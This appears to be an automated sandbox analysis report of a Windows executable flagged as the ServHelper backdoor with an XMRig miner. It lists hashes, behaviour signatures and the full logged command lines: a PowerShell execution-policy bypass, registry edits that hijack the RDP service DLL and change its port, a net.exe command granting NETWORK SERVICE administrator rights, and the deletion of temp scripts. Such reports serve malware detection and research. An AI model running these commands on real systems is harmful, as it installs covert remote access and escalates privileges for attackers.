Analysis

  • max time kernel
    131s
  • max time network
    140s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    13-10-2021 17:43

General

  • Target

    44d42138d67d0e52c3c26cb726bc8f39.exe

  • Size

    4.2MB

  • MD5

    44d42138d67d0e52c3c26cb726bc8f39

  • SHA1

    2613e0e464b334ed66e34a8cffc174c5603dd1d9

  • SHA256

    074d3a0bcfb3d4b0b179a2495004fb95947de60ce002fded7af1d1781add9d2b

  • SHA512

    9d59b4dfb96bbe5b59f1b5c0561dafd8fe3f2fb1ababf4e7a384577ddf63adb703802187e7a7bfd671c4fd67e84214bb2b3283edae85e0f2a424148d9e0be1fa

Malware Config

Signatures

  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 8 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\44d42138d67d0e52c3c26cb726bc8f39.exe
    "C:\Users\Admin\AppData\Local\Temp\44d42138d67d0e52c3c26cb726bc8f39.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3572
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2224
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ebzvxi4p\ebzvxi4p.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1180
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES468A.tmp" "c:\Users\Admin\AppData\Local\Temp\ebzvxi4p\CSC107718C646414F85A5263584553A3B5D.TMP"
          4⤵
            PID:1412
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2428
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3616
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4392
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:2340
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies registry key
            PID:3192
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:2784
            • C:\Windows\SysWOW64\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1072
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:5004
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4800
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1476
                  • C:\Windows\SysWOW64\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2552
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:5016
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5020
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:5068
                    • C:\Windows\SysWOW64\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1528
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:4700
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:4528
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:4376

                  Network

                  MITRE ATT&CK Enterprise v6

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                    MD5

                    5f640bd48e2547b4c1a7421f080f815f

                    SHA1

                    a8f4a743f5b7da5cba7b8e6fb1d7ad4d67fefc6a

                    SHA256

                    916c83c7c8d059aea295523b8b3f24e1e2436df894f7fae26c47c9bad04baa9c

                    SHA512

                    a6ac100a351946b1bbb40c98aeda6e16e12f90f81063aff08c16d4d9afec8ed65c2cbcf25b42946627d67653f75740b1137dab625c99e9492ba35aba68b79a8e

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                    MD5

                    f3068198b62b4b70404ec46694d632be

                    SHA1

                    7b0b31ae227cf2a78cb751573a9d07f755104ea0

                    SHA256

                    bd0fab28319be50795bd6aa9692742ba12539b136036acce2e0403f10a779fc8

                    SHA512

                    ef285a93898a9436219540f247beb52da69242d05069b3f50d1761bb956ebb8468aeaeadcb87dd7a09f5039c479a31f313c83c4a63c2b2f789f1fe55b4fa9795

                  • C:\Users\Admin\AppData\Local\Temp\RES468A.tmp

                    MD5

                    fe15a1209ee1751ba8eecb8af3700023

                    SHA1

                    5da2af69eacf26b951bdefdf6d83a2ababb2559c

                    SHA256

                    6decff2fcd444e83d6e4d4f4ed22dfb3ebb51cc00d086422e01d015804893750

                    SHA512

                    dbcdaf8231999eb6c11c4f7011d0963904f732271396d09f743c2d42dc6321f05abae754c4a7dfa0e0e233a57be6b8bc32163e200d25aa70008895540433e3cc

                  • C:\Users\Admin\AppData\Local\Temp\ebzvxi4p\ebzvxi4p.dll

                    MD5

                    eb06d24cf0535d06c878ac9c15bc286d

                    SHA1

                    d17b9fc0e1c8ebf9046440fb5a5dc661d78e2b08

                    SHA256

                    79f5b00af174e16734e16ff1cc9730c5f593bff6b6799be153a1590ea606b27f

                    SHA512

                    d6be48c69fb9b033da5cb3af902ecf3e456c64056d8d5cc0d715b45e25f45a815ea6309d49be0c1b24aea2b24f8dd4ba051b409f8806b778b095c52cef90278d

                  • C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

                    MD5

                    794bf0ae26a7efb0c516cf4a7692c501

                    SHA1

                    c8f81d0ddd4d360dcbe0814a04a86748f99c6ff2

                    SHA256

                    97753653d52aaa961e4d1364b5b43551c76da9bb19e12f741bd67c986259e825

                    SHA512

                    20c97972a1256375157f82a859ce4936613fe109d54c63bbec25734edc3a567ca976b342a21ef5f25571b3c1959afe618ad9f9f17a817cfd731d1504541b1a75

                  • C:\Users\Admin\AppData\Local\Temp\ready.ps1

                    MD5

                    28d9755addec05c0b24cca50dfe3a92b

                    SHA1

                    7d3156f11c7a7fb60d29809caf93101de2681aa3

                    SHA256

                    abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

                    SHA512

                    891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

                  • \??\c:\Users\Admin\AppData\Local\Temp\ebzvxi4p\CSC107718C646414F85A5263584553A3B5D.TMP

                    MD5

                    21f772a0c0de7759e18a01a05550ab12

                    SHA1

                    3f76f5c7ea715b458b235be3969b304be3f7f736

                    SHA256

                    54da60d59998ae312f66793212c2ecc27de0f660369b03604e32cc23f273bd0b

                    SHA512

                    0c7343505eac67fa1def7bda5b1d0c9cbaed05e2d1807fb5cdb578265a18c042370636a4f4675375c33b8cbfeb1aad1a4edac1069bda2adf866515ab8b8fb3e8

                  • \??\c:\Users\Admin\AppData\Local\Temp\ebzvxi4p\ebzvxi4p.0.cs

                    MD5

                    9f8ab7eb0ab21443a2fe06dab341510e

                    SHA1

                    2b88b3116a79e48bab7114e18c9b9674e8a52165

                    SHA256

                    e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

                    SHA512

                    53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

                  • \??\c:\Users\Admin\AppData\Local\Temp\ebzvxi4p\ebzvxi4p.cmdline

                    MD5

                    961f7a08d667a2adc7c9bc628a1d2286

                    SHA1

                    4af7960cbc47af458d3450c8de09f11dda752da1

                    SHA256

                    69f70efe6e6ab19d8ef45c55f636d9b5242293ff547924c5716086fb790b47d0

                    SHA512

                    9158bea41757d60cc7d3f079263af4b78e1de66154223d2970815e6393aedd8a4071c464e6e6e2f4c76bccc6ccfd5c9334df3559ed1ddb16fa057fffbc98e1a6

                  • memory/1072-1005-0x0000000000000000-mapping.dmp

                  • memory/1180-149-0x0000000000000000-mapping.dmp

                  • memory/1412-152-0x0000000000000000-mapping.dmp

                  • memory/1476-1010-0x0000000000000000-mapping.dmp

                  • memory/1528-1015-0x0000000000000000-mapping.dmp

                  • memory/2224-134-0x0000000004D42000-0x0000000004D43000-memory.dmp

                    Filesize

                    4KB

                  • memory/2224-129-0x0000000004AA0000-0x0000000004AA1000-memory.dmp

                    Filesize

                    4KB

                  • memory/2224-132-0x0000000004D40000-0x0000000004D41000-memory.dmp

                    Filesize

                    4KB

                  • memory/2224-133-0x00000000073E0000-0x00000000073E1000-memory.dmp

                    Filesize

                    4KB

                  • memory/2224-1062-0x000000007EE90000-0x000000007EE91000-memory.dmp

                    Filesize

                    4KB

                  • memory/2224-135-0x00000000072F0000-0x00000000072F1000-memory.dmp

                    Filesize

                    4KB

                  • memory/2224-136-0x0000000007B10000-0x0000000007B11000-memory.dmp

                    Filesize

                    4KB

                  • memory/2224-138-0x0000000007BF0000-0x0000000007BF1000-memory.dmp

                    Filesize

                    4KB

                  • memory/2224-139-0x0000000007F70000-0x0000000007F71000-memory.dmp

                    Filesize

                    4KB

                  • memory/2224-140-0x00000000080F0000-0x00000000080F1000-memory.dmp

                    Filesize

                    4KB

                  • memory/2224-141-0x0000000008370000-0x0000000008371000-memory.dmp

                    Filesize

                    4KB

                  • memory/2224-156-0x00000000092C0000-0x00000000092C1000-memory.dmp

                    Filesize

                    4KB

                  • memory/2224-143-0x0000000004AA0000-0x0000000004AA1000-memory.dmp

                    Filesize

                    4KB

                  • memory/2224-147-0x0000000009970000-0x0000000009971000-memory.dmp

                    Filesize

                    4KB

                  • memory/2224-148-0x0000000008580000-0x0000000008581000-memory.dmp

                    Filesize

                    4KB

                  • memory/2224-130-0x0000000004AA0000-0x0000000004AA1000-memory.dmp

                    Filesize

                    4KB

                  • memory/2224-128-0x0000000000000000-mapping.dmp

                  • memory/2224-158-0x0000000004D43000-0x0000000004D44000-memory.dmp

                    Filesize

                    4KB

                  • memory/2224-131-0x0000000004BE0000-0x0000000004BE1000-memory.dmp

                    Filesize

                    4KB

                  • memory/2224-179-0x0000000009420000-0x0000000009421000-memory.dmp

                    Filesize

                    4KB

                  • memory/2340-966-0x0000000000000000-mapping.dmp

                  • memory/2428-190-0x0000000004982000-0x0000000004983000-memory.dmp

                    Filesize

                    4KB

                  • memory/2428-195-0x0000000003030000-0x0000000003031000-memory.dmp

                    Filesize

                    4KB

                  • memory/2428-180-0x0000000000000000-mapping.dmp

                  • memory/2428-182-0x0000000003030000-0x0000000003031000-memory.dmp

                    Filesize

                    4KB

                  • memory/2428-181-0x0000000003030000-0x0000000003031000-memory.dmp

                    Filesize

                    4KB

                  • memory/2428-216-0x000000007F290000-0x000000007F291000-memory.dmp

                    Filesize

                    4KB

                  • memory/2428-189-0x0000000004980000-0x0000000004981000-memory.dmp

                    Filesize

                    4KB

                  • memory/2552-1011-0x0000000000000000-mapping.dmp

                  • memory/2784-968-0x0000000000000000-mapping.dmp

                  • memory/3192-967-0x0000000000000000-mapping.dmp

                  • memory/3572-118-0x0000000005570000-0x0000000005571000-memory.dmp

                    Filesize

                    4KB

                  • memory/3572-122-0x0000000005D90000-0x0000000005D91000-memory.dmp

                    Filesize

                    4KB

                  • memory/3572-126-0x00000000063C0000-0x00000000063C1000-memory.dmp

                    Filesize

                    4KB

                  • memory/3572-115-0x0000000000C3D000-0x0000000001043000-memory.dmp

                    Filesize

                    4.0MB

                  • memory/3572-116-0x0000000001050000-0x0000000001452000-memory.dmp

                    Filesize

                    4.0MB

                  • memory/3572-121-0x0000000005572000-0x0000000005573000-memory.dmp

                    Filesize

                    4KB

                  • memory/3572-119-0x0000000005990000-0x0000000005D8F000-memory.dmp

                    Filesize

                    4.0MB

                  • memory/3572-123-0x0000000005490000-0x0000000005491000-memory.dmp

                    Filesize

                    4KB

                  • memory/3572-117-0x0000000000400000-0x0000000000841000-memory.dmp

                    Filesize

                    4.3MB

                  • memory/3572-124-0x0000000005573000-0x0000000005574000-memory.dmp

                    Filesize

                    4KB

                  • memory/3572-125-0x0000000005574000-0x0000000005575000-memory.dmp

                    Filesize

                    4KB

                  • memory/3572-127-0x0000000008240000-0x0000000008241000-memory.dmp

                    Filesize

                    4KB

                  • memory/3616-475-0x000000007F4E0000-0x000000007F4E1000-memory.dmp

                    Filesize

                    4KB

                  • memory/3616-447-0x0000000006B12000-0x0000000006B13000-memory.dmp

                    Filesize

                    4KB

                  • memory/3616-436-0x0000000000000000-mapping.dmp

                  • memory/3616-445-0x0000000006B10000-0x0000000006B11000-memory.dmp

                    Filesize

                    4KB

                  • memory/4376-1030-0x0000000000000000-mapping.dmp

                  • memory/4392-704-0x0000000004782000-0x0000000004783000-memory.dmp

                    Filesize

                    4KB

                  • memory/4392-703-0x0000000004780000-0x0000000004781000-memory.dmp

                    Filesize

                    4KB

                  • memory/4392-688-0x0000000000000000-mapping.dmp

                  • memory/4392-730-0x000000007EF80000-0x000000007EF81000-memory.dmp

                    Filesize

                    4KB

                  • memory/4528-1029-0x0000000000000000-mapping.dmp

                  • memory/4700-1016-0x0000000000000000-mapping.dmp

                  • memory/4800-1009-0x0000000000000000-mapping.dmp

                  • memory/5004-1006-0x0000000000000000-mapping.dmp

                  • memory/5016-1012-0x0000000000000000-mapping.dmp

                  • memory/5020-1013-0x0000000000000000-mapping.dmp

                  • memory/5068-1014-0x0000000000000000-mapping.dmp